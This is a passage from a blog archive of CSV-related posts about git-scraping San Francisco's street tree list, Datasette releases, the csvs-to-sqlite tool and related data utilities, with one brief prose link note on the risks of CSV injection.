  git push -q https://${GITHUB_PERSONAL_TOKEN}@github.com/simonw/sf-tree-history.git master \
  || true

This script does all of the work.

First it backs up the existing Street_Tree_list.csv as Street_Tree_List-old.csv, in order to be able to run a comparison later.
It downloads the latest copy of Street_Tree_List.csv from the San Francisco data portal
It adds the file to the git index and sets itself an identity for use in the commit
It installs my csv-diff utility from PyPI
It uses csv-diff to create a diff of the two files, and writes that diff to a new file called message.txt
Finally, it attempts to create a new commit using message.txt as the commit message, then pushes the result to GitHub

The last line is the most complex. Circle CI will mark a build as failed if any of the commands in the run block return a non-0 exit code. git commit returns a non-0 exit code if you attempt to run it but none of the files have changed.

git commit ... && git push ... || true ensures that if git commit succeeds the git push command will be run, BUT if it fails the || true will still return a 0 exit code for the overall line - so Circle CI will not mark the build as failed.

There’s one last trick here: I’m using git push -q https://${GITHUB_PERSONAL_TOKEN}@github.com/simonw/sf-tree-history.git master to push my changes to GitHub. This takes advantage of Circle CI environment variables, which are the recommended way to configure secrets such that they cannot be viewed by anyone browsing your Circle CI builds. I created a personal GitHub auth token for this project, which I’m using to allow Circle CI to push commits to GitHub on my behalf.

Next steps

I’m really excited about this pattern of using GitHub in combination with Circle CI to track changes to any file that is being posted on the internet. I’m opening up the code (and my csv-diff utility) in the hope that other people will use them to set up their own tracking projects. Who knows, maybe there’s a file out there that’s even more exciting than San Francisco’s official list of trees!

Tags: csv, data-journalism, git, projects, san-francisco, git-scraping

Datasette 0.23: CSV, SpatiaLite and more

2018-06-18T15:34:04+00:00

Datasette 0.23: CSV, SpatiaLite and more

The big new feature in 0.23 is CSV export: any Datasette table or query can now be exported as CSV, including the option to get all matching rows in one giant CSV file taking advantage of Python 3 async and Datasette’s efficient keyset pagination. Also in this release: improved support for SpatiaLite and various JSON API improvements including the ability to expand foreign key labels in JSON and CSV responses.

Via @simonw

Tags: projects, csv, datasette

sqlitebiter

2018-05-17T22:40:28+00:00

sqlitebiter

Similar to my csvs-to-sqlite tool, but sqlitebiter handles “CSV/Excel/HTML/JSON/LTSV/Markdown/SQLite/SSV/TSV/Google-Sheets”. Most interestingly, it works against HTML pages—run “sqlitebiter -v url ’https://en.wikipedia.org/wiki/Comparison_of_firewalls’” and it will scrape that Wikipedia page and create a SQLite table for each of the HTML tables it finds there.

Tags: datasette, scraping, csv, sqlite

csvs-to-sqlite 0.8

2018-04-24T16:11:01+00:00

csvs-to-sqlite 0.8

I released a new version of my csvs-to-sqlite tool this morning with a bunch of handy new features. It can now rename columns and define their types, add the CSV filenames as an additional column, add create indexes on columns and parse dates and datetimes into SQLite-friendly ISO formatted values.

Tags: projects, csv, sqlite

Parsing CSV using ANTLR and Python 3

2018-04-06T14:33:58+00:00

Parsing CSV using ANTLR and Python 3

I’ve been trying to figure out how to use ANTLR grammars from Python—this is the first example I’ve found that really clicked for me.

Tags: antlr, csv, parsing, python

django-postgres-copy

2018-01-26T00:43:04+00:00

django-postgres-copy

Really neat Django queryset add-on which exposes the PostgreSQL COPY statement for importing (and exporting) CSV data. MyModel.objects.from_csv(“filename.csv”). Built by the team of data journalists at the California Civic Data Coalition.

Via Cut down database imports by a third using this one weird trick

Tags: csv, postgresql, django

Datasette Publish: a web app for publishing CSV files as an online database

2018-01-17T14:11:05+00:00

I’ve just released Datasette Publish, a web tool for turning one or more CSV files into an online database with a JSON API.

Here’s a demo application I built using Datasette Publish, showing Californian campaign finance data using CSV files released by the California Civic Data Coalition.

And here’s an animated screencast showing exactly how I built it:

Datasette Publish combines my Datasette tool for publishing SQLite databases as an API with my csvs-to-sqlite tool for generating them.

It’s built on top of the Zeit Now hosting service, which means anything you deploy with it lives on your own account with Zeit and stays entirely under your control. I used the brand new Zeit API 2.0.

Zeit’s generous free plan means you can try the tool out as many times as you like - and if you want to use it for an API powering a production website you can easily upgrade to a paid hosting plan.

Who should use it

Anyone who has data they want to share with the world!

The fundamental idea behind Datasette is that publishing structured data as both a web interface and a JSON API should be as quick and easy as possible.

The world is full of interesting data that often ends up trapped in PDF blobs or other hard-to-use formats, if it gets published at all. Datasette encourages using SQLite instead: a powerful, flexible format that enables analysis via SQL queries and can easily be shared and hosted online.

Since so much of the data that IS published today uses CSV, this first release of Datasette Publish focuses on CSV conversion above anything else. I plan to add support for other useful formats in the future.

The three areas I’m most excited in seeing adoption of Datasette are data journalism, civic open data and cultural institutions.

Data journalism because when I worked at the Guardian Datasette is the tool I wish I had had for publishing data. When we started the Guardian Datablog we ended up using Google Sheets for this.

Civic open data because it turns out the open data movement mostly won! It’s incredible how much high quality data is published by local and national governments these days. My San Francisco tree search project for example uses data from the Department of Public Works - a CSV of 190,000 trees around the city.

Cultural institutions because the museums and libraries of the world are sitting on enormous treasure troves of valuable information, and have an institutional mandate to share that data as widely as possible.

If you are involved in any of the above please get in touch. I’d love your help improving the Datasette ecosystem to better serve your needs.

How it works

Datasette Publish would not be possible without Zeit Now. Now is a revolutionary approach to hosting: it lets you instantly create immutable deployments with a unique URL, via a command-line tool or using their recently updated API. It’s by far the most productive hosting environment I’ve ever worked with.

I built the main Datasette Publish interface using React. Building a SPA here made a lot of sense, because it allowed me to construct the entire application without any form of server-side storage (aside from Keen for analytics).

When you sign in via Zeit OAuth I store your access token in a signed cookie. Each time you upload a CSV the file is stored directly using Zeit’s upload API, and the file metadata is persisted in JavaScript state in the React app. When you click “publish” the accumulated state is sent to the server where it is used to construct a new Zeit deployment.

The deployment itself consists of the CSV files plus a Dockerfile that installs Python, Datasette, csvs-to-sqlite and their dependencies, then runs csvs-to-sqlite against the CSV files and starts up Datasette against the resulting database.

If you specified a title, description, source or license I generate a Datasette metadata.json file and include that in the deployment as well.

Since free deployments to Zeit are “source code visible”, you can see exactly how the resulting application is structured by visiting https://datasette-onrlszntsq.now.sh/_src (the campaign finance app I built earlier).

Using the Zeit API in this way has the neat effect that I don’t ever store any user data myself - neither the access token used to access your account nor any of the CSVs that you upload. Uploaded files go straight to your own Zeit account and stay under your control. Access tokens are never persisted. The deployed application lives on your own hosting account, where you can terminate it or upgrade it to a paid plan without any further involvement from the tool I have built.

Not having to worry about storing encrypted access tokens or covering any hosting costs beyond the Datasette Publish tool itself is delightful.

This ability to build tools that themselves deploy other tools is fascinating. I can’t wait to see what other kinds of interesting new applications it enables.

Discussion on Hacker News.

Tags: csv, projects, zeit-now, datasette

csvkit

2018-01-08T21:03:38+00:00

csvkit

“A suite of command-line tools for converting to and working with CSV”—includes a huge range of utilities for things like converting Excel and JSON to CSV, grepping, sorting and extracting a subset of columns, combining multiple CSV files together and exporting CSV to a relational database. Worth reading through the tutorial which shows how the different commands can be piped together.

Tags: csv, datasette

Himalayan Database: From Visual FoxPro GUI to JSON API with Datasette

2018-01-08T19:26:49+00:00

Himalayan Database: From Visual FoxPro GUI to JSON API with Datasette

The Himalayan Database is a compilation of records for all expeditions that have climbed in the Nepalese Himalaya, originally compiled by journalist Elizabeth Hawley over several decades. The database is published as a Visual FoxPro database—here Raffaele Messuti‏ provides step-by-step instructions for extracting the data from the published archive, converting them to CSV using dbfcsv and then converting the CSVs to SQLite using csvs-to-sqlite so you can browse them using Datasette.

Via Raffaele Messuti‏

Tags: csv, datasette

Big Data Workflow with Pandas and SQLite

2017-11-28T23:02:50+00:00

Big Data Workflow with Pandas and SQLite

Handy tutorial on dealing with larger data (in this case a 3.9GB CSV file) by incrementally loading it into pandas and writing it out to SQLite.

Via Ben Welsh

Tags: pandas, csv, sqlite

Added TSV example to the README · simonw/csvs-to-sqlite@957d4f5

2017-11-26T07:02:15+00:00

Added TSV example to the README · simonw/csvs-to-sqlite@957d4f5

Thanks to a pull request from Jani Monoses, csvs-to-sqlite can now handle TSV (or any other separator) as well as regular CSVs.

Tags: csv

New in Datasette: filters, foreign keys and search

2017-11-25T21:17:47+00:00

I’ve released Datasette 0.13 with a number of exciting new features (Datasette previously).

Filters

Datasette’s table view supports query-string based filtering. 0.13 introduces a new user interface for constructing those filters. Let’s use it to find every episode where Bob Ross painted clouds and mountains in season 3 of The Joy of Painting:

The resulting querystring looks like this:

?CLOUDS__exact=1&EPISODE__startswith=S03&MOUNTAIN__exact=1

Using the .json or .jsono extension on the same URL returns JSON (in list-of-lists or list-of-objects format), so the new filter UI also acts as a simple API explorer. If you click “View and edit SQL” you will get the generated SQL in an editor, ready for you to further modify it.

Foreign key relationships

Datasette now provides special treatment for SQLite foreign key relationships: if it detects a foreign key when displaying a table it will show values in that column as links to the related records - and if the foreign key table has an obvious label column, that label will be displayed in the column as the link label.

Here’s an example, using San Francisco’s Mobile Food Facility Permit dataset… aka food trucks!

And here’s a portion of the corresponding CREATE TABLE statements showing the foreign key relationships:

CREATE TABLE "Mobile_Food_Facility_Permit" (
    "locationid" INTEGER,
    "Applicant" INTEGER,
    "FacilityType" INTEGER,
    "cnn" INTEGER,
    "LocationDescription" TEXT,
    ...,
    FOREIGN KEY ("Applicant") REFERENCES [Applicant](id),
    FOREIGN KEY ("FacilityType") REFERENCES [FacilityType](id)
);
CREATE TABLE "Applicant" (
    "id" INTEGER PRIMARY KEY ,
    "value" TEXT
);
CREATE TABLE "FacilityType" (
    "id" INTEGER PRIMARY KEY ,
     "value" TEXT
);

If you click through to one of the linked records, you’ll see a page like this:

The “Links from other tables” section lists all other tables that reference this row, and links to a filtered query showing the corresponding records.

Using csvs-to-sqlite to build foreign key tables

The latest release of my csvs-to-sqlite utility adds a feature which complements Datasette’s foreign key support: you can now tell csvs-to-sqlite to “extract” a specified set of columns and use them to create additional tables.

Here’s how to create the food-trucks.db database used in the above examples.

First step: make sure you have Python 3 installed. On OS X with homebrew you can run brew install python3, otherwise follow the instructions on Python.org.

Ensure you have the most recent releases of csvs-to-sqlite and datasette:

pip3 install csvs-to-sqlite -U
pip3 install datasette -U

You may need to sudo these.

Now export the full CSV file from the Mobile Food Facility Permit page.

Here’s a sample of that CSV file:

$ head -n 2 Mobile_Food_Facility_Permit.csv 
locationid,Applicant,FacilityType,cnn,LocationDescription,Address,blocklot,block,lot,permit,Status,FoodItems,X,Y,Latitude,Longitude,Schedule,dayshours,NOISent,Approved,Received,PriorPermit,ExpirationDate,Location
751253,Pipo's Grill,Truck,5688000,FOLSOM ST: 14TH ST to 15TH ST (1800 - 1899),1800 FOLSOM ST,3549083,3549,083,16MFF-0010,REQUESTED,Tacos: Burritos: Hot Dogs: and Hamburgers,6007856.719,2107724.046,37.7678524427181,-122.416104892532,http://bsm.sfdpw.org/PermitsTracker/reports/report.aspx?title=schedule&report=rptSchedule&params=permit=16MFF-0010&ExportPDF=1&Filename=16MFF-0010_schedule.pdf,,,,2016-02-04,0,,"(37.7678524427181, -122.416104892532)"

Next, run the following command:

csvs-to-sqlite Mobile_Food_Facility_Permit.csv \
    -c FacilityType \
    -c block \
    -c Status \
    -c Applicant \
    food-trucks.db

The -c options are the real magic here: they tell csvs-to-sqlite to take that column from the CSV file and extract it out into a lookup table.

Having created the new database, you can use Datasette to browse it:

datasette food-trucks.db

Then browse to http://127.0.0.1:8001/ and start exploring.

Full-text search with Datasette and csvs-to-sqlite

SQLite includes a powerful full-text search implementation in the form of the FTS3, FTS4 and (in the most recent versions) FTS5 modules.

Datasette will look for tables that have a FTS virtual table configured against them and, if detected, will add support for a _search= query string argument and a search text interface as well.

Here’s an example of Datasette and SQLite FTS in action, this time using the DataSF list of Film Locations in San Francisco provided by the San Francisco Film Commission.

If you click on "View and edit SQL" you’ll see how the underlying query works:

select rowid, *
from Film_Locations_in_San_Francisco
where rowid in (
    select rowid
    from [Film_Locations_in_San_Francisco_fts]
    where [Film_Locations_in_San_Francisco_fts] match :search
)

csvs-to-sqlite knows how to create the underlying FTS virtual tables from a specified list of columns. Here’s how to create the sf-film-locations database:

csvs-to-sqlite \
    Film_Locations_in_San_Francisco.csv sf-film-locations.db \
    -c Title \
    -c "Release Year" \
    -c "Production Company" \
    -c "Distributor" \
    -c "Director" \
    -c "Writer" \
    -c "Actor 1:Actors" \
    -c "Actor 2:Actors" \
    -c "Actor 3:Actors" \
    -f Title \
    -f "Production Company" \
    -f Director \
    -f Writer \
    -f "Actor 1" \
    -f "Actor 2" \
    -f "Actor 3" \
    -f Locations \
    -f "Fun Facts"

The -f options are used to specify the columns which should be incorporated into the SQLite full-text search index. Note that the -f argument is compatible with the -c argument described above - if you extract a text column into a separate table, csvs-to-sqlite can still incorporate data from that column into the full-text index it creates.

I’m using another new feature above as well: the CSV file has three columns for actors, Actor 1, Actor 2 and Actor 3. I can tell the -c column extractor to refer each of those columns to the same underlying lookup table like this:

    -c "Actor 1:Actors" \
    -c "Actor 2:Actors" \
    -c "Actor 3:Actors" \

If you visit the Eddie Murphy page you can see that he’s listed as Actor 1 for 14 rows and in Actor 2 for 1.

A search engine for trees!

One last demo, this time using my favourite CSV file from data.sfgov.org: the Street Tree List, published by the San Francisco Department of Public Works.

This time, in addition to publishing the database I also put together a custom UI for querying it, based on the Leaflet.markercluster library. You can try that out at https://sf-tree-search.now.sh/.

Here’s the command I used to create the database:

csvs-to-sqlite Street_Tree_List.csv sf-trees.db \
    -c qLegalStatus \
    -c qSpecies \
    -c qSiteInfo \
    -c PlantType \
    -c qCaretaker \
    -c qCareAssistant \
    -f qLegalStatus \
    -f qSpecies \
    -f qAddress \
    -f qSiteInfo \
    -f PlantType \
    -f qCaretaker \
    -f qCareAssistant \
    -f PermitNotes

Once again, I’m extracting out specified columns and pointing the SQLite full-text indexer at a subset of them.

Since the JavaScript search needs to pull back a subset of the overall data, I composed a custom SQL query to drive those searches.

The full source code for my tree search demo is available on GitHub.

Tags: csv, projects, search, sqlite, datasette

harelba/q

2017-11-25T17:49:19+00:00

harelba/q

q is a neat command-line utility that lets you run SQL queries directly against CSV and TSV files. Internally it works by firing up an in-memory SQLite database, and as of the latest release (1.7.1) you can use the new --save-db-to-disk option to save that in-memory database to disk.

Via Harel Ben-Attia

Tags: csv, sqlite

csvs-to-sqlite: Refactoring columns into separate lookup tables

2017-11-17T06:41:16+00:00

csvs-to-sqlite: Refactoring columns into separate lookup tables

I just shipped a new version of csvs-to-sqlite with the ability to extract specified columns into a separate SQLite lookup table by passing additional command-line arguments.

Tags: projects, csv

simonw/csvs-to-sqlite

2017-11-13T06:49:45+00:00

simonw/csvs-to-sqlite

I built a simple tool for bulk converting multiple CSV files into a SQLite database.

Tags: csv, sqlite, github, datasette, projects

The Absurdly Underestimated Dangers of CSV Injection

2017-10-10T04:13:46+00:00

The Absurdly Underestimated Dangers of CSV Injection

This is horrifying. A plain old CSV file intended for import into Excel can embed formulas (a value prefixed with an equals symbol) which can execute system commands—with a big honking security prompt that most people will likely ignore. Even worse: they can embed IMPORTXML() functions that can silently leak data from the rest of the sheet to an external URL—and those will work against Google Sheets as well as Excel.

Tags: csv, security

No PDFs!

2009-11-01T12:04:36+00:00

No PDFs!

The Sunlight Foundation point out that PDFs are a terrible way of implementing “more transparent government” due to their general lack of structure. At the Guardian (and I’m sure at other newspapers) we waste an absurd amount of time manually extracting data from PDF files and turning it in to something more useful. Even CSV is significantly more useful for many types of information.

Tags: opengovernment, sunlightfoundation, adobe, csv, open-data, pdf